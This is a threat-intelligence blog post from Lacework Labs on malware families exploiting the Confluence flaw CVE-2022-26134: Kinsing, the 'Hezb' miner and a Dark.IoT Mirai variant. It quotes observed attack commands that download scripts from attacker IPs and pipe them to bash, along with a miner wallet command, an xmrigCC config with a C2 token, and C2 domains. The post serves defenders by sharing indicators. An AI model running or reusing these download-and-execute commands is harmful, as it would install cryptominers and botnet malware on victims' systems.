Kinsing & Dark.IoT botnet among threats targeting CVE-2022-26134 - Lacework

Kinsing & Dark.IoT botnet among threats targeting CVE-2022-26134

Chris Hall - Cloud Security Researcher - Lacework Labs

June 7, 2022

More flexibility and visibility with agentless coverage for workloadsDetails regarding the recent Confluence OGNL (CVE-2022-26134) exploit were released to the public on June 3rd 2022. Shortly following this, Lacework Labs began seeing multiple attacks in the wild from both uncategorized and named threats. While this was expected, there appears to be more widespread exploitation of CVE-2022-26134 compared to previous Confluence vulnerabilities.

As of this writing we have observed active exploitation by known Cloud threat malware families such as  Kinsing, “Hezb”, and the Dark.IoT botnet. This blog provides a current inventory of top threats seen exploiting this latest Confluence vulnerability. Additional IOCs associated with this vulnerability are included in our Github repo.

Kinsing

Kinsing is often one of the first threats to add a new exploit to their toolbox, and CVE-2022-26134 was no different. One interesting development was the use of a new malware host – 195.2.79.26 for the Kinsing installer. This is noteworthy because Kinsing often leverages legacy infrastructure in their attacks. Observed payload commands for CVE-2022-26134:

/bin/sh -c wget -q -O - http://185.191.32.198/cf.sh | bash > /dev/null 2>&1

bash -c (curl -s 195.2.79.26/cf.sh||wget -q -O- 195.2.79.26/cf.sh)|bash

The initial payload cf.sh is currently not available on VirusTotal. However, it’s a typical installer which downloads and runs the Kinsing H2miner malware as well as a userland level rootkit via  libsystem.so. This shared object in turn would be leveraged in LD_PRELOAD attacks (T1574.006).

Hezb

Another threat, dubbed “Hezb” based on command line artifact data, was observed around Kinsing. This malware is relatively new and was recently reported in late May exploiting WSO2 RCE (CVE-2022-29464) in the wild. Several malware components were observed, the first of which was an XMRig miner installed as “Hezb”. Additional modules included a polkit exploit for privilege escalation as well as a zero-detection ELF payload named “kik”. The following table lists observed artifacts and descriptions.

CMDLINE artifacts Description
curl -o hezb http://202.28.229.174/sys.x86_64
Initial payload command – XMRig
hezb -o 199.247.0.216:80 -u 
46HmQz11t8uN84P8xgThrQXSYm434VC7hhNR8be4QrGtM1Wa4cDH2GkJ2NNXZ6Dr4bYg6phNjHKYJ1QfpZRBFYW5V6qnRJN -p ap8 -k -B
XMRig configuration command. XMRig username. Username first seen in early May with various malware
bash -c curl 202.28.229.174/root.sh|bash
Second stage installer

Attempts to run ap.sh via polkit privilege escalation

./ko -o dom http://202.28.229.174/ko
curl -o kik http://202.28.229.174/kik
Zero detection ELF binary

Prior to the Hezb miner, another XMRig variant was observed and is believed to belong to the same group via shared infrastructure. This miner is a variant of xmrigCC which is a modified version of XMRig with C2 capabilities. Payload command:

curl http://134.213.29.14:32953/2/c2/java.tar.gz --output /var/tmp/java.tar.gz

Static configurations:

"pools": [

  {

    "algo": null,

    "coin": null,

    "url": "91[.]217[.]81[.]162:443",



    "pass": "x",

    "rig-id": "con2022",

    "nicehash": false,

    "keepalive": false,

    "enabled": true,

    "tls": true,

    "tls-fingerprint": null,

    "daemon": false,

    "socks5": null,

    "self-select": null,

    "submit-to-origin": false

  }

],

"cc-client": {

  "enabled": true,

  "url": "91.217.81.162:80",

  "access-token": "sd893Lkhsdg81LKjgpqffss4KLjjsl",

  "use-tls": false,

  "use-remote-logging": true,

  "upload-config-on-start": true,

  "worker-id": null,

  "reboot-cmd": null,

  "update-interval-s": 60

},

Privilege Escalation via pwnkit (binary name: ko)

CVE-2021-4034 released earlier this year resulted in privilege escalation via a bug in the SETUID application “polkit”. The aptly named “pwnkit” exploit was observed being spread within droppers taking advantage of the most recent confluence vulnerability.The image below shows the Ghidra decompilation for this utility, aligning to many of the public proof-of-concept exploits that exist on Github for this vulnerability.

Figure 1. Hezb component Ko

Post Execution Payload  – Kik

Kik is a statically linked, non-stripped 64-bit Golang ELF binary. This binary attempts to match for specific values while excluding others and pipes the resulting values to “kill -9”.This is executed in a while true loop printing out “command executed successfully” to stdout.

Figure 2. Hezb component Kik

Dark.IoT

A unique Mirai variant was also installed as “x” and was downloaded from host 136.144.41.171. Observed commands:

/bin/sh -c wget -q -O - 136.144.41.171/atl | sh > /dev/null 2>&1

wget 136.144.41.171/x

This malware is characterized by alternative DNS connections and connects to several *.lib domains using custom DNS servers. The following observed DNS servers, hostnames and resolutions were observed:

C2 host DNS Servers Resolved IPs
tempest.lib
94.247.43.254
95.217.229.211
162.243.19.47
94.16.114.254
194.36.144.87
62.4.23.97
dragon.lib
95.217.229.211
162.243.19.47
94.16.114.254
193.70.30.98
blacknurse.lib
144.76.157.242
94.247.43.254
194.36.144.87
95.217.229.211
5.206.227.244
babaroga.lib
144.76.157.242
94.16.114.254
95.217.229.211
162.243.19.47
94.247.43.254
203.0.113.0

This set of Mirai activity was reported in September 2021 targeting Realtek devices as part of the Dark.IoT botnet. Dark.IoT is a prolific botnet that has expanded its activity beyond targeting of IoT devices, for example with an Oracle weblogic exploit and targeting of Azure Open Management infrastructure.

Exploits involving Confluence are always popular among various threats including those targeting cloud. While Lacework Labs observed a lot of activity relative to other exploits, there is still low exposure compared to the more impactful “coffee break” vulnerabilities such as those involving log4j or apache. For a complete list of IoCs observed in CVE-2022-26134 exploitation, refer to our Github. For more content like this, check us out on Twitter and LinkedIn!